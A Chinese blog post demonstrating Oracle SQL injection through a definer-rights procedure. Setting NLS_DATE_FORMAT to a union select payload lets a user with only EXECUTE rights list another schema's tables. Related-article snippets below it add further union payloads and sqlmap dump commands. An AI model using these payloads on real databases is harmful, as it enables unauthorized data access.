oracle 登录sql注入,oracle 轻松小sql注入

最新推荐文章于 2024-05-20 21:14:17 发布
最新推荐文章于 2024-05-20 21:14:17 发布
阅读量158 收藏
点赞数
文章标签: oracle 登录sql注入

今天看tom的有提到一个很有趣的东东,只授权的procedure execute,别人就可以sql注入,以后你可得小心了,下面请看我的试验

[oracle@aix ~]$ sqlplus anbob/anbob

SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011

Copyright (c) 1982, 2007, Oracle.  All Rights Reserved.

Connected to:

Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production

With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> select * from v$version;

BANNER

----------------------------------------------------------------

Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi

PL/SQL Release 10.2.0.4.0 - Production

CORE    10.2.0.4.0      Production

TNS for Linux: Version 10.2.0.4.0 - Production

NLSRTL Version 10.2.0.4.0 - Production

SQL> select * from all_users;

USERNAME                          USER_ID CREATED

------------------------------ ---------- -------------------

ZYY                                  1099 2011-08-30 11:41:03

GZPX_DB                              1070 2011-08-30 11:41:01

GIAF                                 1069 2011-08-30 11:41:01

DEAN_TRAIN                           1068 2011-08-30 11:41:01

...

75 rows selected.

SQL> select * from tab;

TNAME                          TABTYPE  CLUSTERID

------------------------------ ------- ----------

TEST                           TABLE

TESTA                          TABLE

TESTB                          TABLE

TESTBLOB                       TABLE

TESTC                          TABLE

TESTIMG                        TABLE

TESTKDR                        TABLE

TESTXY                         TABLE

8 rows selected.

SQL> create or replace procedure badboy( p_date in date )

2  as

3  l_rec   all_users%rowtype;

4  c       sys_refcursor;

5  l_query long;

6  begin

7  l_query := 'select * from all_users where created = ''' ||p_date ||'''';

8  dbms_output.put_line( l_query );

9  open c for l_query;

10  for i in 1 .. 10

11  loop

12  fetch c into l_rec;

13  exit when c%notfound;

14  dbms_output.put_line( l_rec.username || '.....' );

15  end loop;

16  close c;

17  end;

18  /

Procedure created.

SQL> set serveroutput on;

SQL> exec badboy(sysdate);

select * from all_users where created = '2011-08-30 18:55:04'

PL/SQL procedure successfully completed.

SQL> grant execute on badboy to icme;

Grant succeeded.

SQL> conn icme/icme

Connected.

SQL> set serveroutput on

SQL> exec anbob.badboy(sysdate);

select * from all_users where created = '2011-08-30 18:57:44'

PL/SQL procedure successfully completed.

SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';

Session altered.

SQL> exec anbob.badboy(sysdate);

select * from all_users where created = ''union select tname,0,sysdate from tab--'

TEST.....

TESTA.....

TESTB.....

TESTBLOB.....

TESTC.....

TESTIMG.....

TESTKDR.....

TESTXY.....

PL/SQL procedure successfully completed.

呵,是不是很眼熟,这当然是anbob的表,这些表并没有授权给icme。同样也可以从all_tab_columns得到列,那样就可以得到表只的一部份数据了...

[本帖最后由 zhangweizhao 于 2011-8-31 08:46 编辑]

温特二Winter
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB安全之:Oracle 数据库 SQL 注入
f_carey的博客
06-10 1958
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 SQL 注入之三:Oracle 数据库1 Oracle 数据库 SQL 注入基础知识1.1 Oracle 特性1.1.1 dual 表1.1.2 null 类型1.2 `||` 连接运算符1.3 注释符号1.4 Oracle 注入常用语句及函数2 注入检测方法2.1 正常查询方法2.2 基于闭合报错的检测方法2.
SQL注入-Oracle手工+sqlmap
xiaoheizi的博客
06-28 1259
-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解。
Oracle SQL 注入
prahs的专栏
07-14 8910
Oracle SQL 注入本文主要总结在Oracle注入中的步骤方法和注意事项: 参考了:http://www.freebuf.com/articles/web/5411.html 注入常用语句 常用步骤 注意事项 常用步骤1 找注入点 用单引号’之类的触发报错 用or 1=1, or 1=2之类的观察反馈 2 判断数据库类型 oracle 支持– 类型注释,但是不支持;分隔执行多语句,orac
oracle:sql注入
最新发布
kzr380203739的专栏
05-20 84
3、cookie注入注入字段在cookie数据中,网站使用通用的防注入程序,会对get、post提交的数据进行过滤,缺往往遗漏对cookie中的数据进行过滤。4、其他注入:http请求的其他内容出发的SQL注入漏洞,如user-agent、referer、x-forwarded-for(xff,)等。xff代表客户端“真实的IP地址”,xff注入注入点位置在头部的xff头的位置。5、二次注入注入位置在引用我们提前插入的恶意字段。2、post注入注入字段在PAST提交的数据中。
sql注入oracle(1)
qq_43423320的博客
03-16 1806
sql注入oracle 1. 判断为oracle and exist (select * from dual ) 或者and (selecr count(*) from user_tables)>0 -- 2. 获取基本信息 (1) 获取字段数 order by N (2) 获取数据库版本 and 1=2 union select 1,2,(select banner from sys.v_$version where rownum =1),4,5 from dual (3)获取数据库连
Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))
T1ngSh0w的博客
09-08 1605
Oracle数据库注入-墨者学院-SQL手工注入漏洞测试(Oracle数据库)详细讲解
Oracle数据库SQL注入手册1
08-08
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’
Oracle_SQL注入
07-01
### Oracle SQL注入技术详解 #### 一、Oracle SQL注入概述 **Oracle SQL注入**是一种针对使用Oracle数据库的应用程序的安全攻击手段。攻击者通过构造特殊的SQL查询来操纵目标应用程序中的SQL语句,以此来获取敏感...
基于OracleSQL注入与防范策略研究.pdf
09-19
本文针对Oracle数据库的SQL注入攻击及其防范策略进行了深入的研究。文章首先分析了Web应用程序的基本运行机理以及SQL注入攻击的原理,接着通过实例详细介绍了Oracle数据库中SQL注入的过程,并在最后提出了一套综合性...
Oracle数据库SQL注入技术研究.pdf
09-19
Oracle数据库SQL注入技术研究.pdf
Oracle SQL注入技术
04-03
包含三个pdf文件: 1、JSP+OracleSQL注入 .pdf 2、Oracle SQL注入.pdf(讲解dbms包的非法使用过程) 3、Oracle数据库中SQL注入攻击的检测与防御.pdf(一篇学术性文章)
Oracle数据库中SQL注入攻击的检测与防御
03-01
论文介绍了SQL注人攻击及其常用的攻击技术,给出了在Oracle数据库中对SQL注人攻击的检测方法与 防御措施,文中的检测方法和预防措施可以应用到任意的数据库系统中。
Oracle数据库注入
weixin_50464560的博客
08-06 1576
0x01 前言 在渗透测试过程中,总是遇到不熟悉的数据库,知道了有SQL注入漏洞但是无法利用,这总让我很苦恼。因为网上的文章很多都是基于Mysql数据库的,当遇到Oracle数据库时有些数据库层面的不同点对于我们测试总会有点困扰,无法成功利用。故学习了Oracle数据库注入的相关知识,在此总结分享给大家,希望能够对安全从业人员有所帮助。 全文基于对于SQL注入具有一定理解,并且能够在Mysql数据库进行注入的基础上进行阐述。本文旨在讲述Oracle数据库多种情况下如何进行注...
Oracle学习总结(6)—— SQL注入技术
weixin_34194551的博客
09-23 275
不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一。 SQL注入基本介绍 结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行规...
网络安全进阶学习第十五课——Oracle SQL注入
p36273的博客
08-08 1781
Oracle数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。Oracle服务默认端口:1521Oracle和MySQL数据库语法大致相同,结构不太相同。最大的一个特点就是oracle可以调用Java代码。Oracle要求select … from 后必须要有查询的表名。
oraclesql注入
ming_zi_hao_nan_a的博客
12-24 1013
拼sql语句的问题? 会因他人sql注入,而丧失数据 sql注入: 因为sql语句是字符串拼接而成的 sql语句 建议使用PreparedStatement insert: public static void main(String[] args) throws ClassNotFoundException, SQLException { Class.forName("oracle.jd...
SQL注入(Oracle显错注入)---zkaq
weixin_38237216的博客
04-11 1159
1.概念 1.oracle数据库特点:很死板 ,非常讲究语法格式 2.dual:dual是一个实表(也有人说它是虚表),如果你直接查询它,它只显示一个X,列名为DUMMY,dual表实际作用只是为了满足oracle数据库的语法格式 3.特点:没有database()函数,没有limit用法。 4.常用的语句 select * from all_tables 查询出所有的表 select * from user_tables 查询出当前用户的表 select*from all_tab_columns 查询出
web安全-Oracle数据库注入
Coisini的博客
05-31 791
Oracle数据库代码分析 Sql注入形成的主要原因是:由于程序员的安全意识薄弱,在编写代码时没有对用户输入的特殊字符进行处理,导致将特殊字符附带在参数中直接与数据库进行交互。示例代码如下 id . request .getParameter(“id”); String strSQL . “select title ,content fron news where id=” + id; Resu...
基于Oracle网站的SQL注入
Soul Blog
11-26 310
基于Oracle网站的SQL注入 参考链接1 参考链接2 使用 order by 语句查询列数 www.vuln-web.com/photo.php?id=1' order by 1-- Working www.vuln-web.com/photo.php?id=1' order by 10-- www.vuln-web.com/photo.php?id=1' order by 7-- Working www.vuln-web.com/photo.php?id=1' order by 9-- Wor
Oracle开发人员防范SQL注入攻击指南
"Oracle开发人员SQL注入攻击入门教程" 这篇文档详细介绍了Oracle开发人员需要知道的关于SQL注入攻击的相关知识,旨在提高对这种攻击形式的认识并提供防御策略。以下是主要的知识点: 1、**SQL注入概述** SQL注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值